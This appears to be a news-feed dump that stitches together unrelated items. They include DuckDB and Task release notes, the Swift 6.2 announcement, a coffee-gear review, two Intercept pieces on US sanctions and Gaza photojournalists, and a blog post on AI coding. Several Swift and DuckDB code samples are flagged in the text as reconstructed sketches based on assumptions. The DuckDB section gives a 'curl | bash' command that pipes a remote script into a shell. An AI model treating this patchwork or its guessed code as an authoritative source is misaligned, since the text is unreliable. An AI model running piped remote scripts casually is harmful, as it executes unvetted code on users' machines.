Community member
Rusty Conover (@rustyconover)
contributed
an ETA (estimated time of arrival) feature to the DuckDB command line client. Estimating the remaining time is a
difficult problem
as progress measurements can vary a lot due to noise. To alleviate this, the ETA feature first collects some initial performance data, then continues to refine its estimate using a
Kalman filter
. Here's how it works in practice:
Richard (@hawkfish)
built a new window function,
FILL
, that can be used to
interpolate
missing values in ordered windows. Here is an example: a missing value between 1 and 42 is interpolated to 21 in the result.
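The example did not survive extraction; a sketch matching the description (column names assumed):

SELECT ts, fill(v) OVER (ORDER BY ts) AS v_filled
FROM (VALUES (1, 1), (2, NULL), (3, 42)) AS t(ts, v);
-- the missing value between 1 and 42 comes back as 21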
Laurens (@lnkuiper)
rewrote DuckDB’s sorting implementation
(
again
). This new implementation uses a k-way merge sort to reduce data movement. It is also adaptive to pre-sorted data and uses a new API that makes it possible to use this new sorting code elsewhere in DuckDB, for example in window functions. We are seeing much better thread scaling performance with this implementation. We will publish a separate blog post with more detailed performance measurements.
Common table expressions (CTEs) are now materialized by default (instead of inlining them). This both improves performance and resolves some correctness bugs that happened due to inlining.
This feature was
implemented
by
Denis Hirn (kryonix)
, who
contributed support for recursive CTEs
back in 2020.
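If inlining is ever preferable for a specific query, the per-CTE override should still apply (standard syntax, shown here as an assumption about how the new default interacts with it):

WITH t AS NOT MATERIALIZED (
    SELECT range AS x FROM range(10)
)
SELECT * FROM t;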
macOS has a fairly advanced model to ensure system integrity, built around cryptographic signatures along with so-called “
notarization
” by Apple. We had been signing our binaries
for about two years already
.
Starting from this release, the DuckDB command line utility (duckdb) and the dynamic library libduckdb.dylib are released with this notarization. This will reduce the number of complaints when using web browsers to download our binaries. Unfortunately, macOS does not yet fully support notarization of command line utilities, so the “open with double click” use case will still have to wait. The recommended path to install the CLI on macOS is still our install script:
curl https://install.duckdb.org | bash
We have been slowly moving language integrations (“clients”) into their own repositories from
duckdb/duckdb
. For this release, we moved the Python client to its
own repository
,
duckdb/duckdb-python
. Please make sure to
file issues
related to the Python client there.
These were a few highlights – but there are many more features and improvements in this release. There have been over 3,500 commits by over 90 contributors since we released v1.3.2. The full release notes can be
found on GitHub
. We would like to thank our community for providing detailed issue reports and feedback. And our special thanks goes to external contributors, who directly landed features in this release!
How I brew cafe-quality coffee anywhere, from campsite to carry-on
Guardian
www.theguardian.com
2025-09-16 12:00:05
When you’re done settling for the sludge in the hotel lobby, this portable brewing setup will open the door to perfect coffee anywhere Nothing makes me feel more settled than making a cup of coffee in the morning. Without it, my whole day feels slightly off. For years, that was just something I acce...
Nothing makes me feel more settled than making a cup of coffee in the morning. Without it, my whole day feels slightly off. For years, that was just something I accepted about traveling or camping – there
might
be coffee, but it wouldn’t quite ground me. It would be a compromise. A little off.
That’s why I’ve spent the past few years perfecting my travel coffee setup: so I can make rich, comforting, homey coffee anywhere in the world,
without
trying to wedge an espresso machine into my carry-on. Here are the inexpensive tools that make it possible.
Aeropress + Fellow Prismo
Photograph: Jaina Rodríguez-Grey
This is the star of the show. The humble Aeropress is a remarkably versatile, durable little device that’s seen me through conferences, multi-state moves, and even a stretch of couch surfing between friends’ places. At its core, it’s just a simple plastic cylinder with a plunger. Add your coffee grounds, pour in hot water, give it a stir, and then plunge it like a giant syringe.
I made one key upgrade, though: instead of the standard cap and paper filters, I use the Fellow Prismo, a high-pressure cap with a reusable metal filter. This swap both eliminates the need for paper filters, and aerates the coffee as you press, giving it a touch of crema and a boost in both flavor and aroma.
When I’m staying in a hotel, I’ll usually track down a local cafe and pick up a bag of beans. Most spots are happy to grind them for you, and it’s worth it: those commercial-grade burr grinders give you an incredibly even grind, which makes a big difference in flavor.
Plus, it’s a great way to connect with the local coffee scene. You’re not just getting a caffeine fix — you’re tasting your travels, supporting a small business, and maybe discovering a roast you’ll end up ordering again once you’re back home. On trips to Seattle, I used to drop in to Caffe Vita for a bag of its rich and velvety Queen City blend, and Kuma
Coffee
for Momma Bear, a half-caf blend that makes my afternoons wonderfully buzzy without ruining my sleep schedule.
Coffee storage
Photograph: Jaina Rodríguez-Grey
Going to a cafe isn’t always an option though, especially if you’re miles deep in the wilderness. For those times, you’ll want to rely on either pre-ground or whole beans in an airtight container. I’ve had success using a small mason jar with an airtight lid. Durable, washable, reusable.
Some travel containers like the Fellow Atmos offer a vacuum-seal feature, but I’ve tested my mason jar against dozens of vacuum sealed containers, and honestly I can’t taste a difference unless I let the coffee sit for three to four days, unopened. As long as you open your mason jar every couple days, you shouldn’t get any flavor issues. So for our purposes here, I just find a mason jar to be the easiest, cheapest, and most versatile pick by far.
If you’re traveling with whole beans and want that fresh-ground flavor every time, you’ll need a grinder that’s compact and reliable. I recommend the Hario Skerton Plus. It’s the perfect size to pair with an Aeropress, and its ceramic burrs grind consistently without overheating your beans. It fits in your hand, packs easily and gets the job done, whether you’re camping or posted up in a hotel room.
If you’ll have access to power, the Fellow Stagg EKG is my go-to travel kettle. It’s sleek, quick-heating, and insulated well enough to keep your water hot for close to an hour. The gooseneck spout gives you precise control for brewing, and the compact body fits into a carry-on without issue. I often pack my Aeropress inside the kettle itself, then stash the whole bundle in my suitcase.
I’ve had mine for nearly five years. It’s a little scuffed from all the travel, but still runs perfectly – and I use it literally every day.
If you’re in the woods, the Filter US editor Nick Mokey recommends the Camp Chef Stryker 200, which runs on either compact isobutane canisters, or the ubiquitous green propane cylinders you can find at any gas station. It’s also crazy fast, boiling enough water for two cups of coffee in under two minutes.
Jaina Rodríguez-Grey is a freelance journalist and coffee obsessive whose work has appeared in Wired, Vice, Westlaw and beyond. She’s covered everything from civil litigation to video games and sex tech. When she’s not testing espresso machines or coffee grinders, she’s either making her way through Seattle’s cafe scene – or remembering (finally) to update her newsletter.
Trump Sanctions Palestinian Human Rights Groups for Doing Their Job. Anybody Could Be Next.
Intercept
theintercept.com
2025-09-16 12:00:00
It’s the first time the U.S. has sanctioned an organization specifically for using lawful, peaceful tools of advocacy.
The post Trump Sanctions Palestinian Human Rights Groups for Doing Their Job. Anybody Could Be Next. appeared first on The Intercept....
Benjamin Netanyahu and Donald Trump during a dinner in the White House on July 7, 2025, in Washington.
Photo: Andrew Harnik/Getty Images
Sarah Leah Whitson is the executive director of DAWN.
For decades, the Treasury Department has politicized its authority to impose sanctions. Now, however, with the Trump administration sanctioning three Palestinian human rights organizations, civil society activists around the world are shocked and terrified: Could they be next?
The alarm is due to the brazen willingness of President Donald Trump to sanction the staff of these Palestinian groups specifically because of their advocacy with the International Criminal Court to hold Israeli war criminals accountable.
It’s the first time the U.S. has levied sanctions against an organization specifically for its efforts to use lawful, peaceful tools of advocacy in pursuit of legal accountability. There is no pretense other than the groups’ work on legal issues that the administration doesn’t like.
Copying another page from the authoritarian playbook, Trump now has global civil society directly in the crosshairs of the U.S. government’s legal, financial, and criminal arsenals. The next disfavored issue, these groups fear, could be climate change, arms control, or reproductive rights — virtually anything.
To justify its recent sanctions against Al Haq, Al Mezan Center for Human Rights, and the Palestinian Center for Human Rights, the Treasury announcement said the groups “directly engaged in efforts by the International Criminal Court (ICC) to investigate, arrest, detain, or prosecute Israeli nationals.”
The only other sanction the U.S. ever imposed on a human rights organization was earlier this year against Addameer, a Palestinian group that the Trump administration claimed was linked to the Popular Front for the Liberation of Palestine, a U.S.-designated terrorist organization.
Blocking Accountability
Trump has gone far out of his way to shield Israel from any form of judicial accountability for its atrocities in Gaza, illegal occupation, and apartheid rule.
The sanctions on the Palestinian organizations follow extensive attacks and threats against the ICC itself, including sanctions against the ICC prosecutor who secured the arrest warrants against Israeli Prime Minister Benjamin Netanyahu and former Defense Minister Yoav Gallant. Later, four of the judges who approved the warrants were also sanctioned.
The new Treasury sanctions also follow in lockstep with Israel’s near-identical sanctions against human rights groups and activists. On June 30, Israel imposed sanctions on Al Haq Europe, Law for Palestine, the Hind Rajab Foundation, Lawyers for Palestinian Human Rights, and DAWN, where I am the executive director. Additionally, Israel targeted individual staff members of these organizations, myself included.
As with the U.S., Israel explained these moves as punishment for the work these groups did with the ICC’s Palestine prosecution.
Both the Israeli and U.S. sanctions clearly violate the Rome Statute, the treaty that established and governs the ICC. Article 70 of the treaty prohibits obstruction of justice, and the sanctions by Israel and the U.S. are seeking to interfere with the court’s prosecution.
For Americans caught up in the sanctions, there are also First Amendment issues. The sanctions could chill protected speech, advocacy, or engagement by hanging “material support” charges over the heads of those who would work with the ICC or the sanctioned Palestinian organizations. Federal courts have already concluded that this chilling effect can take place, issuing preliminary injunctions in two cases in favor of plaintiffs who argued the sanctions had impinged on their free speech rights.
Short of a judicial ruling overturning the sanctions entirely, however, Americans will remain in fear of prosecution simply for talking to the court or these organizations.
All for Israel
The effectively unregulated ability of the U.S. to deploy its powerful sanctions arsenal has now moved beyond the usual grounds of terrorism, human rights abuses, or violation of U.S. laws or other sanctions to include anything the Trump administration disfavors.
There’s nothing to stop this administration from seeking to sanction any other organization in the world for pursuing advocacy at odds with Trump’s worldview.
The Biden administration’s feeble effort to reform America’s gargantuan global sanctions regime, which it critiqued as an overused “tool of first resort,” ended up producing a seven-page report and zero concrete action.
Secretary of State Marco Rubio and congressional Republicans have made no secret of their aim to crush pro-Palestine activism with every tool available. Immigrant students were the first targets, swept into deportation proceedings for their speech about Palestine.
Now, the administration and its allies are pursuing more concrete moves. Last week, Rep. Brian Mast, R-Fla., introduced a bill that would allow the secretary of state to revoke the passports of Americans accused of giving material support to a terrorist group.
As happened with immigrant students, the provision could easily be used to label criticism of Israel as tantamount to support for Palestinian groups, such as Hamas, designated as terrorists by the U.S. (Following The Intercept’s coverage of the bill and widespread opposition to the measure, Mast moved to strike the language.)
The passport bill followed a narrowly defeated effort to include a provision in Trump’s “One Big Beautiful Bill Act” that would allow the Treasury Department to strip nonprofit organizations of their tax-exempt status merely by accusing them of supporting terrorism.
Efforts to quash Israel’s prosecution at the ICC with these sanctions may seem less dangerous than U.S. military and financial support for Israel’s genocide in Gaza, efforts to annex the West Bank, and military attacks against seven other countries in the Middle East. And the sanctions may be less consequential than the unprecedented attack on academic freedom by punishing universities for speech critical of Israel.
What the sanctions do, though, is open up an entirely new front for the Trump administration’s global attack on civil society around the world — all in defense of Israel.
A few people have asked me how I use AI coding tools. I don’t think it’s a straightforward answer.
For me it’s not really a procedure or recipe, it’s more of an ethos.
Principle: Ownership
You own the code your AI produces.
Use your own name to commit AI code so that if something breaks, everyone blames you. This is critical. How well do you need to know the code your AI produces? Well enough that you can answer for its mistakes.
In lean manufacturing they have the principle of Genchi genbutsu, i.e. “go and see for yourself.” In High Output Management, Andy Grove pushes “management by walking around”. Andy defines the output of a manager as the output of their entire org as well as the organizations under their influence.
The trouble with phrasing it as “AI coding” is it tricks you into thinking it’s just another individual role like software engineering, when it actually has a lot more in common with management. It’s unfortunate we hire and mentor for it as if it were software engineering.
What does the algorithm actually do? Did it find all of the places to refactor?
Resist the urge to say, “oh, I just vibe coded this”. You coded it, and if it sucks, it’s because you don’t know how to manage your AI. Own it.
Principle: Exploit Gradients
Not all time spent is equal. For some things, you can put in a little bit of effort and get a huge amount of reward. In business, we call those opportunities.
Examples:
Biology: A tiger migrates to where there’s more food. Less effort for more food.
Arbitrage: Buy cheap, send to another country and sell expensive. Less effort for more money.
AI coding isn’t about writing code, it’s about creating and exploiting gradients. Finding opportunities where you can spend 10 minutes of AI time and reap a huge reward.
The contrived example is proofs of concept. You can just do it, figure out whether it really works in practice the way it seems like it should, and abandon it quickly when it doesn’t.
Or data analysis. Traditionally, data analysis was labor intensive, but now you can spin out a sick dashboard in a few minutes. Maybe that helps you avoid a dead end, or push your org in a new direction.
The key is to always be on the lookout for opportunities.
That feels a lot more like a shrewd businessman than a software engineer. Indeed! It’s a mistake that we transparently hire and promote software engineers into these roles. It’s a new beast.
How to become an AI Coder
I’m terrified of the future of software engineering.
Oh, I’ll continue having a job for a very long time. No concern about that. I’m worried that junior engineers won’t be promoted because it’s easier to dispatch a request to an AI than to give juniors the tasks that they traditionally learned the trade from.
But actually, this isn’t software engineering.
If anyone with their head on straight can take ownership and exploit gradients, then maybe junior engineers have an edge on seniors who are too stuck in their ways to realize they’ve been put in a new job role.
Task now includes built-in core utilities to greatly improve compatibility on Windows. This means that your commands that use cp, mv, mkdir or any other common core utility will now work by default on Windows, without extra setup. This is something we wanted to address for many, many years, and it's finally being shipped! Read our blog post about this topic. (#197, #2360 by @andreynering).
Began releasing nightly builds. This will allow people to test our changes before they are fully released and without having to install Go to build them (#2358 by @vmaerten).
Added experiments to the taskrc schema to clarify the expected keys and values (#2235 by @vmaerten).
Added support for new properties in .taskrc.yml: insecure, verbose, concurrency, remote offline, remote timeout, and remote expiry. ⚠️ Note: setting offline via environment variable is no longer supported. (#2389 by @vmaerten)
Added a --nested flag when outputting tasks using --list --json. This will output tasks in a nested structure when tasks are namespaced (#2415 by @pd93).
Enhanced support for tasks with wildcards: they are now logged correctly, and wildcard parameters are fully considered during fingerprinting (#1808, #1795 by @vmaerten).
We recently released our official GitHub Action. This is based on the fantastic work by the Arduino team who created and maintained the community version. Now that this is officially adopted, fixes/updates should be more timely. We have already merged a couple of longstanding PRs in our first release (by @pd93, @shrink, @trim21 and all the previous contributors to arduino/setup-task).
NOTE: v3.45.0-v3.45.2 were skipped due to issues with our release process.
We’re excited to announce Swift 6.2, a release aimed at making every Swift developer more productive, regardless of where or how you write code. From improved tooling and libraries to enhancements in concurrency and performance, Swift 6.2 delivers a broad set of features designed for real-world development at every layer of the software stack.
Read on for a deep dive into changes to the language, libraries, workflows, platform support, and next steps for getting started with Swift 6.2.
Swift 6.2 lowers the barrier to concurrent programming with a set of changes designed to reduce boilerplate and let you write safe concurrent code more naturally:
Single-threaded by default: Run your code on the main thread without explicit @MainActor annotations using the new option to isolate code to the main actor by default. This option is ideal for scripts, UI code, and other executable targets.
Intuitive async functions: Write async code without concurrent access to mutable state. Previously, nonisolated async methods always switched to the global executor that manages the concurrent thread pool, which made it difficult to write async methods for class types without data-race safety errors. In Swift 6.2, you can migrate to an upcoming feature where async functions run in the caller’s execution context, even when called on the main actor.
Opting into concurrency with @concurrent: Introduce code that runs concurrently using the new @concurrent attribute. This makes it clear when you want code to remain serialized on an actor, and when code may run in parallel.
// In '-default-isolation MainActor' mode
struct Image {
    // The image cache is safe because it's protected
    // by the main actor.
    static var cachedImage: [URL: Image] = [:]

    static func create(from url: URL) async throws -> Image {
        if let image = cachedImage[url] {
            return image
        }
        let image = try await fetchImage(at: url)
        cachedImage[url] = image
        return image
    }

    // Fetch the data from the given URL and decode it.
    // This is performed on the concurrent thread pool to
    // keep the main actor free while decoding large images.
    @concurrent
    static func fetchImage(at url: URL) async throws -> Image {
        let (data, _) = try await URLSession.shared.data(from: url)
        return await decode(data: data)
    }
}
Together, these improvements let you write data-race free code with less annotation overhead and provide more predictable behavior for async code, while still allowing you to introduce concurrency when you need it.
Swift 6.2 includes features designed to maximize performance without compromising safety. These features help you write safe, low-level code with predictable performance and minimal overhead.
InlineArray is a new fixed-size array with inline storage for elements, which can be stored on the stack or directly within other types without additional heap allocation. You can introduce an inline array by writing the size in angle brackets before the element type, or by using the of shorthand syntax:
struct Game {
    // Shorthand for InlineArray<40, Sprite>
    var bricks: [40 of Sprite]

    init(_ brickSprite: Sprite) {
        bricks = .init(repeating: brickSprite)
    }
}
The new Span type offers safe, direct access to contiguous memory. Span maintains memory safety by ensuring the memory remains valid while you’re using it. These guarantees are checked at compile time with no runtime overhead, and define away the memory safety problems inherent to pointers, such as use-after-free bugs.
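To make that concrete, here’s a minimal sketch of summing the elements of a Span, assuming the standard library’s span property on Array (added alongside Span in Swift 6.2); the sum function itself is just an illustration:
// A Span parameter gives safe, borrowed access to contiguous
// storage without copying and without unsafe pointers.
func sum(_ values: Span<Int>) -> Int {
    var total = 0
    // Span is indexed by zero-based offsets.
    for i in 0 ..< values.count {
        total += values[i]
    }
    return total
}

let measurements = [12, 7, 31, 4]
// `span` exposes the array's contiguous storage as a Span.
print(sum(measurements.span)) // 54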
Swift 6.2 enhances its capabilities for low-level and security-critical projects beyond new APIs:
Embedded Swift: Embedded Swift now includes Swift’s full String APIs, any types for class-constrained protocols, and the new InlineArray and Span types.
Opt-in strict memory safety: Swift has provided memory safety since its inception, while allowing use of unsafe constructs like unsafe pointers when needed, such as using a C API that accepts pointers. Swift 6.2 introduces opt-in strict memory safety, which flags uses of unsafe constructs, so you can replace them with safe alternatives or explicitly acknowledge them in source code. It’s opt-in because the majority of projects don’t need this level of enforcement — strict memory safety is best left for projects with the strongest security requirements.
Beyond language improvements, Swift 6.2 smooths the day-to-day iteration cycle of editing, building, and debugging code.
The Swift extension for VS Code is now officially verified and distributed by Swift.org. The latest version of the extension includes:
Background indexing by default: Write code with fast, always-up-to-date editor features like jump-to-definition and code completion.
Built-in LLDB debugging: Step through Swift code, set breakpoints, and inspect state using LLDB right inside VS Code.
Swift project panel: Navigate your Swift project’s targets, dependencies, and tasks in the Explorer view.
Live DocC preview: Preview your rendered documentation side-by-side with your code, updated live as you type.
These workflow improvements make it easier to work on Swift projects in your environment of choice with first-class tooling.
Swift 6.2 enhances how you manage compiler warnings by allowing control at the diagnostic group level. A diagnostic group is a category of warnings identified by a name. You can specify the desired behavior of warnings in a diagnostic group in a Swift package manifest using the treatWarning method on SwiftSetting, or promote all warnings to errors using the treatAllWarnings method. For example, you can promote all warnings to errors except for warnings about uses of deprecated APIs:
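A sketch of what that could look like in Package.swift (the target name is a placeholder, and “DeprecatedDeclaration” is our assumption for the deprecation diagnostic group’s name):
// Package.swift (excerpt)
.target(
    name: "MyLibrary", // placeholder target name
    swiftSettings: [
        // Promote every warning to an error...
        .treatAllWarnings(as: .error),
        // ...but keep deprecation warnings as warnings.
        // ("DeprecatedDeclaration" is an assumed group name.)
        .treatWarning("DeprecatedDeclaration", as: .warning),
    ]
)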
Swift 6.2 significantly improves clean build times for projects that use macro-based APIs. Previously, the build system had to first fetch and build the swift-syntax package from source before building the macro project, which noticeably lengthened compile times, especially in CI environments. SwiftPM now supports pre-built swift-syntax dependencies, completely eliminating an expensive build step.
Swift 6.2 makes it much easier to follow what’s happening in concurrent code when debugging with LLDB:
Robust async stepping: Reliably step into asynchronous functions in LLDB, even when the async call requires switching threads.
Surfacing task context: See which task a piece of code is running on when stopped at a breakpoint and when viewing the backtrace for the current thread.
Named tasks: Assign human-readable names when creating tasks, which are surfaced in the task context in debugging and profiling tools (see the sketch below).
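As a small, hypothetical sketch of task naming (refreshFeed is a placeholder operation):
// The name is surfaced in the task context shown by debugging
// and profiling tools when execution stops inside this task.
Task(name: "feed-refresh") {
    try await refreshFeed() // placeholder async operation
}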
Swift 6.2 includes migration tooling to help you adopt upcoming language features:
Identify source incompatibility: Identify code patterns that will no longer compile or change behavior when the upcoming feature is enabled through warnings from migration tooling.
Automate code changes: Apply fix-its to update your code to preserve its existing behavior.
This streamlines the process of enabling upcoming features by eliminating the tedious task of manual code changes. You can learn more about migration tooling in the Swift migration guide.
Whether you’re managing external processes, reacting to state changes, or writing test suites, the Swift 6.2 libraries are evolving to help you write cleaner and safer code.
Swift 6.2 introduces a new Subprocess package that offers a streamlined, concurrency‑friendly API for launching and managing external processes. This includes APIs built with async/await, fine-grained control over process execution, platform-specific configuration, and more—ideal for scripting, automation, and server‑side tasks:
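As a taste of the API’s shape (a sketch based on the version 0.1 examples; exact names and defaults may differ as the package evolves toward 1.0):
import Subprocess

// Run `git rev-parse HEAD` and collect its output; `.name(_:)`
// resolves the executable via PATH.
let result = try await run(
    .name("git"),
    arguments: ["rev-parse", "HEAD"]
)
print(result.standardOutput ?? "")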
Explore the full API surface for version 0.1 in the swift-subprocess repository; feedback from your adoption will inform the API that is released in version 1.0.
In Swift 6.2, the Foundation library includes a modern NotificationCenter API that uses concrete notification types instead of relying on strings and untyped dictionaries for notification names and payloads. This means you can define a notification struct with stored properties, and observers can use the type without error-prone indexing and dynamic casting. Notification types also specify whether they’re posted synchronously on the main actor or asynchronously through a conformance to MainActorMessage or AsyncMessage, which eliminates concurrency errors when working with main actor notifications.
Swift 6.2 enables streaming transactional state changes of observable types using the new Observations async sequence type. Updates include all synchronous changes to the observable properties, and the transaction ends at the next await that suspends. This avoids redundant UI updates, improves performance, and ensures that your code reacts to a consistent snapshot of the value.
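In practice it looks something like this sketch (the Player type is our own example, and strict-concurrency details are elided):
import Observation

@Observable
final class Player {
    var score = 0
}

let player = Player()

// Each element is a transactional snapshot: synchronous mutations
// are coalesced, and the next element is produced at the following
// suspension point.
let scores = Observations { player.score }

Task {
    for await score in scores {
        print("score is now \(score)")
    }
}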
Swift Testing in Swift 6.2 adds new APIs for enhanced expressivity in your tests and test results:
Exit testing lets you verify that code terminates under specific conditions, such as a failed precondition. Your exit tests run in a new process and validate that the exit behavior is what you expect, making it possible to exercise critical failure paths like you would in any other test (see the sketch after this list).
Attachments let you include additional context in test results, including strings, images, logs, and other artifacts, surfaced in test reports or written to disk. This makes it easier to diagnose failures with concrete evidence—whether that’s a screenshot of a UI state, a JSON payload, or a trace of steps leading up to the issue.
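Here is a sketch of an exit test for a failing precondition (the test and its names are hypothetical):
import Testing

@Test func rejectsNegativeBalance() async {
    // The body runs in a fresh process; the test passes if that
    // process terminates the way we expect (here: abnormally).
    await #expect(processExitsWith: .failure) {
        let balance = -42
        precondition(balance >= 0, "balance must be non-negative")
    }
}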
Swift 6.2 gains support for WebAssembly, also known as Wasm. WebAssembly is a virtual machine platform focused on portability, security, and high performance. You can build both client and server applications for Wasm and deploy to the browser or other runtimes. Learn more about Wasm in the vision for WebAssembly support in Swift.
Thank you to everyone who shared their experiences, frustrations, and insights that guided the design of Swift 6.2, especially the approachable concurrency model. Your feedback made it clear where the language could be friendlier, where safety needed to feel more natural, and where the tools could make you more productive. The improvements in Swift 6.2 are only possible because of your voices.
If you’re excited about where Swift is headed, there’s no better time to get involved in the Swift community. From participating in Swift Evolution, to contributing code on GitHub, or sharing feedback on how the language feels in real-world projects, every voice helps shape Swift’s future. Whether you’re a seasoned programmer or just starting out, our community thrives on collaboration and welcomes new perspectives. Join in, learn from others, and help make Swift a better language.
Ready to upgrade? Install the latest toolchain using Swiftly (swiftly install 6.2) or from Swift.org/install and start exploring Swift 6.2 today.
Author
Holly Borla is a member of the Swift Core Team and Language Steering Group, and the engineering manager of the Swift language team at Apple.
“They Fear Our Lenses”: Gaza Photojournalists Speak Out
Intercept
theintercept.com
2025-09-16 10:02:00
Photographers in Gaza risk their lives to witness the war. Their images speak louder than the critics trying to discredit them.
The post “They Fear Our Lenses”: Gaza Photojournalists Speak Out appeared first on The Intercept....
Ibrahim Nofal’s photograph of his mother, Muneera, receiving treatment on June 20, 2025, after being hit by shrapnel from an Israeli attack. She died shortly after.
Photo: Ibrahim Nofal
Israel killed six journalists with an airstrike on a press tent in Gaza City last month. Among the dead in the August 10 attack were Al Jazeera correspondent Anas Al-Sharif and his colleague, photojournalist Mohammad Nofal.
In the days leading up to the killing, I had been speaking with Mohammad’s brother and fellow photojournalist, Ibrahim Nofal, 27, about what it’s like to be a photojournalist in Gaza today, to witness horror and massacres.
“This is the only thing I know how to do,” he said. “Every person here has a role in this war. Mine is to document. If I don’t photograph it, this moment will never exist.”
The day after Israel killed his brother, I asked Ibrahim what he misses most. He immediately responded: “My mother and my brothers Omar and Mohammad, who were killed in this genocide. I had a life in Turkey when I was traveling; I had plans. But none of it matters now. Only my mother and brothers do.”
My own brother, Ali Skaik, and I spoke with Ibrahim and five other photojournalists in Gaza about their daily lives and what the deadly task of documenting the genocide means to them. We also asked them to share one photo that is close to their hearts. I fear that any of them may join the ranks of the 221 other journalists that Israel has killed in Gaza in the past two years. I fear that my brother and I could be killed any day too, as the Israeli military advances closer to our home.
Ibrahim Nofal
Photo: Courtesy of Ibrahim Nofal
Ibrahim is still working, despite the risks. He’s come close to death before. “Once, a gas canister exploded beside me — I thought it was the end. Another time, a house we were documenting was hit, and everyone around me was injured,” he said. His home was bombed on October 30, 2023, and five of his cameras were destroyed.
His photos have not only traveled far, they have changed lives: Some of those he photographed were able to leave Gaza for medical treatment because the world saw their suffering.
He keeps documenting. “The camera is my weapon,” he said. “It respects me because I respect it. Through it, I make the world see Gaza and its people.”
Documenting the genocide is not a choice — it is a responsibility, carried out with a sense of duty and love for our homeland and people. In Gaza, every image carries a cost, and every photographer bears both the burden of memory and the duty of witness.
Yazan Abu Foul, a 2-year-old resident of Al-Shati refugee camp, suffering from severe malnutrition amid widespread famine in the Gaza Strip on July 19, 2025.
Photo: Abdul Hakim Abu Riash
Abdul Hakim Abu Riash, 37, captured a searing photograph of starvation in Gaza: the image of 2-year-old Yazan Abu Foul in the Al-Shati refugee camp, suffering from severe malnutrition.
Abu Riash in his press gear.
Photo: Courtesy of Abdul Hakim Abu Riash
“The reality, however, is far harsher than what has been reported,” Abu Riash said. “During the most recent closure of the crossings, I myself lost 13 kilograms — my weight dropped from 67 to nearly 53” kilograms, or from 147 to 117 pounds. Food remains scarce, with prices 10 times higher than before the Israeli restriction of food. “If this is my condition as an adult, one can only imagine the plight of children, especially those with chronic illnesses who rely on specific nutritional needs,” he said. “Their suffering is far greater, and under this blockade and the denial of food entry, their situation is only worsening — leading already to the deaths of dozens of children.”
“I risk my life and everything I own to share realities that cannot be hidden behind propaganda,” he said. “We’ve had to learn new lessons on how to adapt in the field, to keep working under almost impossible conditions, and to find ways of ensuring our message still reaches the world.”
He traces his love for photography back to his boyhood in Beit Lahia in the northern Gaza Strip. His first mobile phone with a camera, bought in 2005, felt like a miracle, he said. He was capturing photos of nature in Beit Lahia, sunsets, and daily life scenes. By 2011, after the first war on Gaza, he turned his passion into journalism, determined to document the truth.
For Abu Riash, images touch emotions before they reach the mind. “A photograph speaks to everyone — even the blind can feel its weight through silence. It’s the world’s only common language,” he said.
One particular image left a mark on Abu Riash: a photograph of a young girl embracing the bodies of her family members, killed in an Israeli airstrike on their home in Deir al-Balah. The shock was etched on her face, her grief uncontainable. “Every photo I take is a witness for history. I want the world to see the truth: the suffering of my people and their resilience. Nothing less,” he said.
“The Truth Is Our Weapon”
Men gather around the body of slain photojournalist Anas Al-Sharif at his funeral on Aug. 11, 2025, following an Israeli attack on the press tent in Gaza City.
Photo: Ayman al-Hessi
For Ayman Majed al-Hessi, 32, photojournalism was imposed on him. He studied electronics engineering and Islamic sciences before life pushed him into the media. Since 2018, he has worked with Al Jazeera Mubasher and captured beauty and wars, drawn by the belief that images have more power than words. “When I photograph, I’m not documenting strangers. I’m documenting my people, my father, my mother, my siblings, and my neighbors,” he said.
He has lived through multiple wars, but the current one has been different. He has been injured three times since October 2023, the first during the early days of the war while covering Al-Shati refugee camp. “I moved from being a reporter to a photojournalist overnight,” al-Hessi recalled, “but also to a survivor.”
Ayman al-Hessi
Photo: Courtesy of Ayman al-Hessi
His cameras and equipment were destroyed when his family home was bombed. With no tools, he resorted to a cheap Xiaomi phone, yet even from that device, he broadcast some of the most haunting images of Gaza’s devastation. One of al-Hessi’s widely circulated images shows the targeting of journalist Ismail Al-Ghoul. After photographing a massacre, the images linger in al-Hessi’s mind, preventing restful sleep.
“The Israeli occupation tries to silence us. They accuse us of using artificial intelligence when we show famine,” al-Hessi added, “they close our social media accounts and keep threatening us. But our responsibility is to show the world what is happening. The truth is our weapon.”
“Images are stronger than texts,” al-Hessi said. “If I describe a flower, you’ll imagine one thing. But if I show it, the truth is undeniable. The occupation knows this. That’s why they fear our lenses.”
There are many images that have stayed with al-Hessi, but the harshest of all was the moment his brother Akram was killed. “I was filming the aftermath of an airstrike on the Shati refugee camp. People around me were shouting his name: ‘Akram, Akram!’ When I reached the site, I found my brother Akram lying lifeless, and my father clutching his body, screaming in anguish,” remembered al-Hessi.
The weight of loss bleeds into his words. He has lost his brother, his uncle, and 50 close friends. “I miss everything,” he admitted. “Our homes, our places, the people we lost.” Yet still he photographs, because if he doesn’t, no one will know. “Every photo is not just for history,” he said. “It’s for my family, my neighbors, my people.”
“Before, I Looked for Beauty and Daily Life”
Two little friends walk hand in hand through the rubble of Suhail Nassar’s Gaza neighborhood, Tel al-Hawa, on March 20, 2025.
Photo: Suhail Nassar
Suhail Nassar, 30, is a photojournalist who used to capture Gaza’s hidden beauty: the laughter of children, sunsets over the Mediterranean, fleeting moments of joy. Photography began as a hobby for him, until he became a photojournalist to show the world how the people of Gaza live.
Suhail Nassar
Photo: Courtesy of Suhail Nassar
Since October 7, 2023, his lens has shifted. “Before, I looked for beauty and daily life. Now, everything I shoot is death, hunger, and ruins,” Nassar said. Direct bombardment, lack of supplies, and the absence of safety anywhere are great risks for photojournalists in Gaza. Yet the worst risk for them is becoming a target simply because of carrying their cameras. “There is no true protection here; you try to pick safe angles, move quickly, and keep your eyes on all directions.”
“You don’t really deal with the trauma,” Nassar said. “You carry it with you. The pictures stay in your head, stronger than any archive.”
But he feels compelled to document reality as it is. “If we do not document, no one will know what happens to us. Silence erases us. I photograph so that no one can ever say, ‘We didn’t know,’” Nassar said.
“These Moments Break You”
Mohammed Hijazi sits in his home in Jabalia refugee camp on April 19, 2025.
Photo: Anas Fteiha
Anas Fteiha
, 31, is a photojournalist from Gaza who works for the Turkish Anadolu Agency. Fteiha never imagined that his profession would demand such sacrifice. He moves constantly between hospitals, bomb sites, and displacement camps.
He recalls one haunting moment: a little girl who had lost both her arms. When another explosion thundered nearby, her instinct was to cover her ears — only to realize she no longer could. “These moments break you,” he admitted. “But they also remind you why you must keep going.”
Anas Fteiha
Photo: Courtesy of Anas Fteiha
“A photo invades your consciousness before you even ask. People may forget articles they read, but they will never forget an image,” Fteiha said. He is currently suing global publishing giant Axel Springer for an article in their German tabloid, BILD, that accused him of being a Hamas propagandist. Axel Springer also owns U.S. publications Politico and Business Insider.
